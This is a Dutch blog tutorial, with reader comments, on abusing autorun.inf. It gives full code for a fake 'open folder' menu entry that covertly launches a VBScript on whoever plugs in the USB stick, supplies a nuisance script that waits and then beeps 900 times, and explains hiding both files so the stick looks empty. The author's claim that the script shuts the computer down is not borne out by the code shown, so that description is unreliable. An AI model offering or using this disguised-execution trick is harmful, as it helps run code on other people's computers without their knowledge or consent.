USB Hacks Deel 1: Autorun

USB Hacks Deel 1: Autorun

Dit is deel 1 van een serie “USB Hacks” die ik ga posten. Het gaat over hoe je dingen kunt aanpassen op je usb-stick zodat je bijvoorbeeld ongemerkt een programma kunt opstarten op het moment dat je een usb in de computer steekt. Dit deel gaat over hoe je een aangepast autorun-bericht kunt laten zien met het autorun.inf bestand.

Autorun.inf

Als je normaal een usb-stick opent, krijg je altijd een schermpje waar je kunt kiezen wat je dan wilt doen. Er staat ook een Map openen en bestanden weergeven. Die optie gaan we namaken, zodat als mensen op Map openen en bestanden weergeven klikken, je ongemerkt een script opent.

Eerst maak je een bestand autorun.inf op je usb-stick aan. Dan dubbelklik je daarop, en krijg je een notepad scherm. Vul daar in:

[autorun]
ShellExecute=script.vbs
action=Map openen en bestanden weergeven
Icon=%systemroot%\system32\shell32.dll,4

ShellExecute bepaalt welk bestand geopend wordt, action is de tekst die je ziet (kun je ook veranderen naar “Open folder to view files” voor engelse pc’s), en Icon is het icoontje dat je naast de tekst ziet, in dit geval een map. Nu zie je dus dit:

usb-hacks-deel-1 (1)

De groene actie is de normale, en de rode is degene die jij net hebt gemaakt. Als je nog wat muziek, foto’s en films op je usb stick zet, wordt de normale actie naar onder verplaatst, zodat je die niet meer ziet. En de neppe autorun werkt ook als je naar Mijn Computer gaat en de usb-stick zelf aanklikt, dan wordt het script ook uitgevoerd.

Het Script (VBScript)

Nu gaan we het script maken die uitgevoerd wordt als je de actie aanklikt. Hiervoor gebruiken we VBScript. Bekijk voor meer informatie daarover de VBScript Handleiding. Maak een bestand met de naam script.vbs, en kopieer deze code:

On error resume next

Dim SH, txtFolderToOpen
Set SH = WScript.CreateObject("WScript.Shell")
txtFolderToOpen = ".\"
SH.Run txtFolderToOpen
Set SH = Nothing

a = 1000
b = 900

for i = 1 to +a
Wscript.Sleep 1000
next

for i = 1 to +b
Set oWS = WScript.CreateObject("WScript.Shell")
oWS.Run "%comspec% /c echo " & Chr(07), 0, True
next

Dit is een script dat ik zelf gemaakt hebt. Het zorgt ervoor dat de map wordt geopend, en 1000 seconden daarna komen er 900 piepjes uit de computer en sluit de computer af. (is aan te passen, verander gewoon de getallen bij a en b).

Om te laten lijken alsof er niks op de usb staat, kun je ook nog script.vbs en autorun.inf verbergen. Dit doe je door de 2 bestanden te selecteren, dan rechtermuisknop -> properties/eigenschappen -> vink Hidden aan. De bestanden kun je zelf nog terugvinden door naar Tools -> Folder Options -> View -> Show hidden files and folders te gaan.

Dit was USB Hacks Deel 1. In het volgende deel gaan we verder met de autorun-functies van een U3 stick zodat er direct een script wordt uitgevoerd zonder een autorun-scherm als je hem erin steekt. Hiervoor gebruik ik een Sandisk Cruzer Micro U3 Stick.

Reacties op USB Hacks Deel 1: Autorun
 1. Jurien

  18 augustus

  Ik heb gedaan wat je beschrijft maar hij opent nog gewoon de map zonder dat hij eerst het programma uitvoert.

  Ik gebruik een normale usb-stick.

  [Antwoord]

  Davey antwoordt (18 augustus):

  Vergeten erbij te zetten, maar op sommige computers doet hij dat automatisch zonder zo’n menu (als je bijvoorbeeld eerder op “deze actie altijd uitvoeren” hebt geklikt).

  Dat kun je veranderen als je naar het Control Panel van de computer gaat en daar zoekt naar de Autoplay instellingen. Daar kun ‘Ask me each time’ instellen. Ik heb wel gemerkt dat het op sommige Vista computers niet werkt (waarom weet ik ook niet), maar op XP bijna altijd wel. ;)

  Jurien antwoordt (18 augustus):

  Heb ik niet opgeklikt, ik zie ook maar 1 keer mappen weergeven staan en niet 2x zoals in het voorbeeld.

  Davey antwoordt (19 augustus):

  Oh, dan denk ik dat het autorun.inf bestand niet goed gelezen wordt.

  Misschien is het per ongeluk autorun.inf.txt geworden. Ga naar het Configuratiescherm en zoek naar “mapopties”. Vink dit aan, en zorg dat autorun.inf geen autorun.inf.txt is.

  Het kan ook zijn dat autorun.inf in een aparte map op de usb staat (bijvoorbeeld K:\scripts\). Dan wordt hij niet gelezen, dus moet je hem in de root van de usb-stick zetten (bijvoorbeeld K:\).

  Hackertje antwoordt (29 december):

  Bij mij werkt het ook niet, ik klik op mijn USB-stick en dan opent hij alleen de map en verder niks!
  Hoe kan dat?
  Mijn USB-stick is FAT32.

  Niloc antwoordt (24 september):

  als ik op bestanden weergeven klik krijg ik alles wat in de map zit te zien maar die script start niet automatisch op en mn laptop sluit er ook niet van af hoe kan da?

  Niloc antwoordt (24 september):

  ik krijg eerst die pop up en als ik dan op bestanden weergeven klik krijg ik alles wat in de usb zit te zien maar die script start niet automatisch op en mn laptop sluit er ook niet van af hoe kan dat?

 2. Hugo

  17 mei

  ik snap het niet, ik heb dat ding bij mapopties aangevinkt, 3 keer gecheckt of het geen .inf.txt is en nog steeds kan ik er niks mee doen, ik heb een windows 7 computer en mijn usb is NTFS. wel gebruik ik een ander script, maar deze heeft wel dezelfde naam
  Wat doe ik fout?

  [Antwoord]

 3. ad

  10 november

  dus ik moet eerst een script maken. en dan met dit erin. of moet dit in een aparte script?

  [Antwoord]

 4. stan

  27 november

  als ik een .inf file maakt verdwijnt i meteen weer

  [Antwoord]

 5. loek

  25 februari

  als ik autorun aanmaak doet hij alleen maar masterhack en niet die 900 piepjes bij 1000 seconden a = 1000
  b = 900

  for i = 1 to +a
  Wscript.Sleep 1000
  next

  [Antwoord]

 6. terence

  07 oktober

  doet hij het ook gewoon op een USB-stick???

  [Antwoord]

 7. ketkev

  12 februari

  mijn virus scanner slaat op hol als ik autorun.inf opsla
  plz help me

  [Antwoord]

 8. Gehackte

  16 maart

  Bij werkt het script het neit ik heb alles van hie boven al geprobeert maar het lukt nog steeds niet. Ik heb een windows 7 computer en ik heb een normale usb stik

  [Antwoord]

 9. WhiteHat

  18 april

  Het Autorun script is uitgeschakeld voor usb’s in windows vista+

  [Antwoord]

 10. Niloc

  24 september

  ik krijg eerst die pop up en als ik dan op bestanden weergeven klik krijg ik alles wat in de usb zit te zien maar die script start niet automatisch op en mn laptop sluit er ook niet van af hoe kan da?

  [Antwoord]

Voeg een reactie toe (Gravatar)